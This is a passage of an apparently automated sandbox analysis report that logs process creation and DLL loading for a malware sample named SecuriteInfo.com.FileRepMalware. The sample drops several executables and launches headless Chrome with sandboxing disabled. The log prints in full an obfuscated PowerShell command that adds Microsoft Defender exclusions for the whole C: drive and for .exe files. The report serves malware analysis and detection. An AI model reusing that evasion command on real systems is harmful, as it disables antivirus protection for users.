                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeProcess created: C:\Users\user\AppData\Roaming\a.exe "C:\Users\user\AppData\Roaming\a.exe"
                      Source: C:\Users\user\AppData\Roaming\a.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-fre --no-default-browser-check --no-first-run --no-sandbox --allow-no-sandbox-job --disable-gpu --mute-audio --disable-audio --user-data-dir="C:\Users\user\AppData\Local\Temp\xizov5lf.xxi"
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --mute-audio --user-data-dir="C:\Users\user\AppData\Local\Temp\xizov5lf.xxi" --no-pre-read-main-dll --field-trial-handle=2336,i,9433496215065290315,15168576315404753794,262144 --variations-seed-version --mojo-platform-channel-handle=2416 /prefetch:3
                      Source: C:\Users\user\AppData\Roaming\a.exeProcess created: C:\Users\user\AppData\Local\Temp\Gelelx.exe "C:\Users\user\AppData\Local\Temp\Gelelx.exe"
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeProcess created: C:\Users\user\AppData\Local\Temp\Vhbyv.exe "C:\Users\user\AppData\Local\Temp\Vhbyv.exe"
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeProcess created: C:\Users\user\AppData\Local\Temp\Gelelx.exe "C:\Users\user\AppData\Local\Temp\Gelelx.exe"
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\license.exe "C:\Users\user\AppData\Roaming\license.exe"
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeProcess created: C:\Users\user\AppData\Local\Temp\Vhbyv.exe "C:\Users\user\AppData\Local\Temp\Vhbyv.exe"
                      Source: C:\Users\user\AppData\Roaming\license.exeProcess created: C:\Users\user\AppData\Roaming\license.exe "C:\Users\user\AppData\Roaming\license.exe"
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\hosts.exe "C:\Users\user\AppData\Roaming\hosts.exe"
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -w 1 -c ".([char]65+[char]100+[char]100+[char]45+[char]77+[char]112+[char]80+[char]114+[char]101+[char]102+[char]101+[char]114+[char]101+[char]110+[char]99+[char]101) -ExclusionPath ([Char]67+[Char]58+[Char]92);.([char]65+[char]100+[char]100+[char]45+[char]77+[char]112+[char]80+[char]114+[char]101+[char]102+[char]101+[char]114+[char]101+[char]110+[char]99+[char]101) -ExclusionExtension 'exe'" Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeProcess created: C:\Users\user\AppData\Roaming\a.exe "C:\Users\user\AppData\Roaming\a.exe" Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-fre --no-default-browser-check --no-first-run --no-sandbox --allow-no-sandbox-job --disable-gpu --mute-audio --disable-audio --user-data-dir="C:\Users\user\AppData\Local\Temp\xizov5lf.xxi"Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeProcess created: C:\Users\user\AppData\Local\Temp\Gelelx.exe "C:\Users\user\AppData\Local\Temp\Gelelx.exe"Jump to behavior
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\user\AppData\Local\Temp\xizov5lf.xxi /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\user\AppData\Local\Temp\xizov5lf.xxi\Crashpad --metrics-dir=C:\Users\user\AppData\Local\Temp\xizov5lf.xxi --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=134.0.6998.36 --initial-client-data=0x108,0x10c,0x110,0xe4,0x114,0x7ffc9d1d4f38,0x7ffc9d1d4f44,0x7ffc9d1d4f50
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-sandbox --user-data-dir="C:\Users\user\AppData\Local\Temp\xizov5lf.xxi" --no-pre-read-main-dll --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=angle --use-angle=swiftshader-webgl --field-trial-handle=2336,i,9433496215065290315,15168576315404753794,262144 --variations-seed-version --mojo-platform-channel-handle=2332 /prefetch:2
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --mute-audio --user-data-dir="C:\Users\user\AppData\Local\Temp\xizov5lf.xxi" --no-pre-read-main-dll --field-trial-handle=2336,i,9433496215065290315,15168576315404753794,262144 --variations-seed-version --mojo-platform-channel-handle=2416 /prefetch:3
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Users\user\AppData\Roaming\license.exe "C:\Users\user\AppData\Roaming\license.exe"
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeProcess created: C:\Users\user\AppData\Local\Temp\Vhbyv.exe "C:\Users\user\AppData\Local\Temp\Vhbyv.exe"
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeProcess created: C:\Users\user\AppData\Local\Temp\Gelelx.exe "C:\Users\user\AppData\Local\Temp\Gelelx.exe"
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeProcess created: C:\Users\user\AppData\Local\Temp\Vhbyv.exe "C:\Users\user\AppData\Local\Temp\Vhbyv.exe"
                      Source: C:\Users\user\AppData\Roaming\license.exeProcess created: C:\Users\user\AppData\Roaming\license.exe "C:\Users\user\AppData\Roaming\license.exe"
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
Source: C:\Windows\System32\svchost.exe  Section loaded: ntlmshared.dll
Source: C:\Windows\System32\svchost.exe  Section loaded: cryptdll.dll
Source: C:\Windows\System32\svchost.exe  Section loaded: webio.dll
Source: C:\Windows\System32\svchost.exe  Section loaded: mswsock.dll
Source: C:\Windows\System32\svchost.exe  Section loaded: winnsi.dll
Source: C:\Windows\System32\svchost.exe  Section loaded: rasadhlp.dll
Source: C:\Windows\System32\svchost.exe  Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\svchost.exe  Section loaded: rmclient.dll
Source: C:\Windows\System32\svchost.exe  Section loaded: usermgrcli.dll
Source: C:\Windows\System32\svchost.exe  Section loaded: execmodelclient.dll
Source: C:\Windows\System32\svchost.exe  Section loaded: propsys.dll
Source: C:\Windows\System32\svchost.exe  Section loaded: coremessaging.dll
Source: C:\Windows\System32\svchost.exe  Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\svchost.exe  Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\svchost.exe  Section loaded: execmodelproxy.dll
Source: C:\Windows\System32\svchost.exe  Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\svchost.exe  Section loaded: vssapi.dll
Source: C:\Windows\System32\svchost.exe  Section loaded: vsstrace.dll
Source: C:\Windows\System32\svchost.exe  Section loaded: samcli.dll
Source: C:\Windows\System32\svchost.exe  Section loaded: samlib.dll
Source: C:\Windows\System32\svchost.exe  Section loaded: es.dll
Source: C:\Windows\System32\svchost.exe  Section loaded: bitsproxy.dll
Source: C:\Windows\System32\svchost.exe  Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe  Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\svchost.exe  Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\svchost.exe  Section loaded: schannel.dll
Source: C:\Windows\System32\svchost.exe  Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\svchost.exe  Section loaded: ntasn1.dll
Source: C:\Windows\System32\svchost.exe  Section loaded: ncrypt.dll
Source: C:\Windows\System32\svchost.exe  Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\svchost.exe  Section loaded: msasn1.dll
Source: C:\Windows\System32\svchost.exe  Section loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exe  Section loaded: rsaenh.dll
Source: C:\Windows\System32\svchost.exe  Section loaded: dpapi.dll
Source: C:\Windows\System32\svchost.exe  Section loaded: mpr.dll
Source: C:\Users\user\AppData\Roaming\a.exe  Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\a.exe  Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\a.exe  Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\a.exe  Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\a.exe  Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\a.exe  Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\a.exe  Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\a.exe  Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\a.exe  Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\a.exe  Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\a.exe  Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\a.exe  Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\a.exe  Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\a.exe  Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\a.exe  Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\a.exe  Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\a.exe  Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\a.exe  Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\a.exe  Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\a.exe  Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\a.exe  Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Roaming\a.exe  Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Roaming\a.exe  Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\a.exe  Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Roaming\a.exe  Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\a.exe  Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Roaming\a.exe  Section loaded: edputil.dll
Source: C:\Users\user\AppData\Roaming\a.exe  Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Roaming\a.exe  Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Roaming\a.exe  Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Roaming\a.exe  Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Roaming\a.exe  Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Roaming\a.exe  Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Roaming\a.exe  Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Roaming\a.exe  Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Roaming\a.exe  Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Roaming\a.exe  Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Roaming\a.exe  Section loaded: rasman.dll
Source: C:\Users\user\AppData\Roaming\a.exe  Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Roaming\a.exe  Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Roaming\a.exe  Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\Gelelx.exe  Section loaded: mscoree.dll
